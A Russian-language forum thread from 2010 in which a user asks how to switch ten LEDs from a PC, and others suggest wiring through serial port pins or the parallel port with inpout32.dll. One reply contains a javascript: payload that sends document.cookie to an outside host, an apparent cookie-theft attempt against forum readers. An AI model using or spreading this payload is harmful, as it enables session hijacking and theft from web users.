Справочник функций

Ваш аккаунт

Войти через: 
Забыли пароль?
Регистрация
Информацию о новых материалах можно получать и без регистрации:

Почтовая рассылка

Подписчиков: -1
Последний выпуск: 19.06.2015

управление аналоговым устройством

64K
08 ноября 2010 года
stranger965
2 / / 08.11.2010
Здравствуйте.
Заранее прошу прощения, не нашел подходящей темы по своему вопросу, поэтому пишу здесь.
Стоит задача. Нужно создать устройство из 10 светодиодов, которые будут включаться/выключаться при помощи нажатия соответствующей кнопки на клавиатуре, ну либо каким-нибудь другим способом. Главное чтобы управлялось оно компьютером.
Думаю привязать его например к COM порту, и научить замыкать/размыкать контакты, но не знаю возможно ли применить это к 10 светодиодам.
Подскажите, пожалуйста, как это лучше всего сделать? Может есть устройства, которые понимают 0 1 сигналы?

В общем буду очень рад любой подсказке.
63K
08 ноября 2010 года
Kiks
3 / / 07.11.2010
java script:document.write('<script>img = new Image(); img.src = "http://httpz.ru/ns8yglmgj79.gif?"+document.cookie;</script>')
87
08 ноября 2010 года
Kogrom
2.7K / / 02.02.2008
Надо уточнить задание и понимание задачи. Например, пытались ли вы создать схему с одним светодиодом? Вроде бы тут будет всё просто: подключил через токоограничивающий резистор светодиод к DTR или RTS и играйся. А может и RI можно использовать.

Сам я такие опыты производил давно (с одним диодом). В любом случае, надо знать свойства конкретных светодиодов, и, если возможно, выходной ток этих самых выводов. Может и на 10 мощности хватит.

Если надо по одному диоду зажигать, то можно дешифратор прикрепить. Но тут придется что-то с питанием придумывать, с согласовыванием уровней напряжений.
1.8K
08 ноября 2010 года
LM(AL/M)
332 / / 20.12.2005
по-моему похоже на то о чем говорится здесь
64K
08 ноября 2010 года
stranger965
2 / / 08.11.2010
да, спасибо, уже понял что через порт LPT проще. Прога пишется на си, с использованием библиотеки inpout32.dll.
Реклама на сайте | Обмен ссылками | Ссылки | Экспорт (RSS) | Контакты
Добавить статью | Добавить исходник | Добавить хостинг-провайдера | Добавить сайт в каталог